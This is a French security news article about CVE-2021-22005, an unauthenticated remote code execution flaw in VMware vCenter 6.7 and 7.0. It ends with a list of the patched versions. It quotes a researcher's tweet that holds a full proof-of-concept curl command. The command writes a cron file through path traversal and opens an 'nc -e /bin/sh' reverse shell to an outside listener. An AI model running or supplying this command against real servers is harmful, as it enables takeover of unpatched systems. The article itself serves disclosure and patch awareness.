VMware vCenter – CVE-2021-22005 : un exploit circule sur le Web !

Je crois qu'il est temps d'en remettre une couche au sujet de la faille de sécurité critique qui touche les serveurs VMware vCenter en version 6.7 et 7.0 : un exploit prêt à l'emploi circule sur le Web, ce qui facilite grandement les attaques !

Comme je l'expliquais dans un précédent article au sujet de cette vulnérabilité CVE-2021-22005, elle peut être exploitée par quelqu'un qui est capable de contacter le serveur vCenter sur le réseau (port 443), peu importe la configuration qui est en place sur le serveur vCenter, et sans être authentifié.

Quant à l'exploit prêt à l'emploi et qui circule sur Internet, il permet d'exploiter cette vulnérabilité et de mettre en place un reverse shell sur le serveur distant, ce qui n'était pas le cas avec l'exploit initial. De quoi permettre l'exécution de code arbitraire, au bon vouloir de l'attaquant.

Initialement, la vulnérabilité touchait le service Analytics de vCenter, mais suite aux informations publiées par un dénommé WVU, il serait possible de passer par le composant Customer Experience Improvement Program, qui est actif par défaut. On pourrait presque parler de deux failles de sécurité différentes, comme le suggère l'analyste du CERT/CC, Will Dormann.

CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.

curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA

— wvu (@wvuuuuuuuuuuuuu) September 27, 2021

Désormais, des groupes de hackers ont pu construire un code d'exploit fonctionnel et prêt à l'emploi pour compromettre facilement les serveurs vCenter, à partir des informations publiées par le chercheur Jang.

Retenez que, n'importe qui capable de joindre un serveur vCenter non patché, peut le compromettre à cause de cette faille de sécurité. Quand on sait qu'il y a des serveurs vCenter accessibles sur une adresse IP publique, voire même indexés dans Google, ce n'est pas rassurant pour les entreprises concernées.

Pour protéger vos serveurs VMware vCenter, vous devez viser les versions suivantes :

• VMware vCenter 7.0 U2c
• VMware vCenter 6.7 U3o
• Bulletin de sécurité VMware

Source

Florian BURNEL Co-founder of IT-Connect

Ingénieur système et réseau, cofondateur d'IT-Connect et Microsoft MVP "Cloud and Datacenter Management". Je souhaite partager mon expérience et mes découvertes au travers de mes articles. Généraliste avec une attirance particulière pour les solutions Microsoft et le scripting. Bonne lecture.

See Full Bio